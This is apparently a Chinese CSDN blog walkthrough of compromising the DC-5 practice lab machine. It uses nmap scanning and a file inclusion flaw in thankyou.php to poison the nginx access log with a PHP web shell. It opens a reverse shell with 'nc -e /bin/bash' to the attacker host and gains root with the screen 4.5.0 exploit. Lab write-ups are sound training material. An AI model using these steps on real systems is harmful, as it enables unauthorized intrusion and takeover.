DC-5靶机渗透笔记(有靶机下载链接)

DC-5靶机下载地址:下载链接

  1. 主机发现
    a.查看本kali(攻击机)ip地址
    ifconfig在这里插入图片描述b.扫面本攻击机本网段发现靶机
    nmap -sP 192.168.6.0/24
    在这里插入图片描述靶机ip为192.168.6.134
  2. 扫描靶机端口确认服务
    nmap -A 192.168.6.134
    发现靶机开放80端口,nginx
    打开浏览器访问一下瞅瞅
    在这里插入图片描述
  3. 访问192.168.6.134
    在这里插入图片描述
    浏览一下发现就contact有个提交界面
    在这里插入图片描述随便提交一下
    在这里插入图片描述刷新一下发现页脚码的时间多次变化
    在这里插入图片描述在这里插入图片描述
  4. 没啥头绪,用dirbuster扫面一下靶机网站目录,看看有啥
    在这里插入图片描述结果
    在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述剩下的以此类推发现就footer.php没见过
    访问一下
    发现时网页上的脚码
    在这里插入图片描述刷新一下发现时间会多次变化。可以怀疑有文件包含漏洞
    即thankyou.php调用了foote.php
  5. 确认是否真的有文件包含漏洞
    在浏览器中输入192.168.6.134/thankyou.php?file=/etc/passwd
    在这里插入图片描述靶机的web服务器使用的是nginx,在网站上的每一步操作都将会被写入日志文件log内,因此我们可以通过log来拿 shell,先看一下能否访问
    在这里插入图片描述也能访问日志文件
  6. 直接使用burpsuite写入一句话
<?php system($_GET['abc']);?>

a.先打开浏览器代理
点击设置
在这里插入图片描述选择手动代理,按照下面的设置来
在这里插入图片描述打开burpsuit
浏览器在靶机网站页面刷新一下,会自动跳到burpsuit
按照下面改一下,然后点击forward
在这里插入图片描述查看是否写入成功
192.168.6.134/thankyou.php?file=/var/log/nginx/access.log&abc=ls
在这里插入图片描述命令执行成功,写入成功
在这里插入图片描述
7. 反弹shell
在攻击机中使用nc监听8888
在这里插入图片描述浏览器中输入,或者继续在brupsuite中修改都可
192.168.6.134/thankyou.php?file=/var/log/nginx/access.log&abc=nc -e /bin/bash 192.168.6.133 8888
在这里插入图片描述然后kali中提示连接成功
在这里插入图片描述
8. 切换交互式shell
python -c “import pty;pty.spawn(’/bin/bash’)”

在这里插入图片描述

  1. 查看用户可用命令
    find / -perm -u=s -type f 2>/dev/null
    在这里插入图片描述

  2. 使用kali自带的漏洞库查询对应漏洞
    searchsploit screen 4.5.0
    在这里插入图片描述使用第二个进行提权
    该文件在
    /usr/share/exploitdb/exploits/linux/local/41154.sh
    然后把里面的代码拷贝出来
    在这里插入图片描述在这里插入图片描述在这里插入图片描述

  3. 编译上面拷贝出来的三个文件
    我把文件拷贝到桌面也编译到做面
    gcc -o /root/桌面/rootshell /root/桌面/rootshell.c
    在这里插入图片描述gcc -fPIC -shared -ldl -o /root/桌面/libhax.so /root/桌面/libhax.c
    在这里插入图片描述

  4. 上传文件
    a.安装ftp
    第一步在shell中输入 apt -get install vsftpd
    b.添加一个用户用于上传文件
    第二步输入 useradd ftpuser
    第三步输入 passwd ftpuser
    第四步会提示输入密码
    第五步切换到home目录下并创建ftpuser文件夹
    mkdir ftpuser
    第六步 赋予权限
    chmod 777 ftpuser
    然后将那三个文件复制到里面就行
    对 a,b两步有疑问的可以私信我

打开ftp服务
在这里插入图片描述查看靶机文件,发现tmp文件夹权限符合要求

在这里插入图片描述
切换到tmp文件夹,连接攻击机ftp服务
cd tmp
ftp 192.168.6.133
ftpuser
密码:123456
在这里插入图片描述上传文件
get libhax.so libhax.so
在这里插入图片描述get rootshell rootshell
在这里插入图片描述get dc-5.sh dc-5.sh
在这里插入图片描述在这里插入图片描述

  1. 执行文件
    添加执行权限chmod +x dc-5.sh
    执行文件 ./dc-5.sh
    在这里插入图片描述看一下是否成功
    whoami
    在这里插入图片描述查看结果
    cd /root
    Ls
    Thisistheflag.txt
    在这里插入图片描述OK!打靶成功
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 3
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值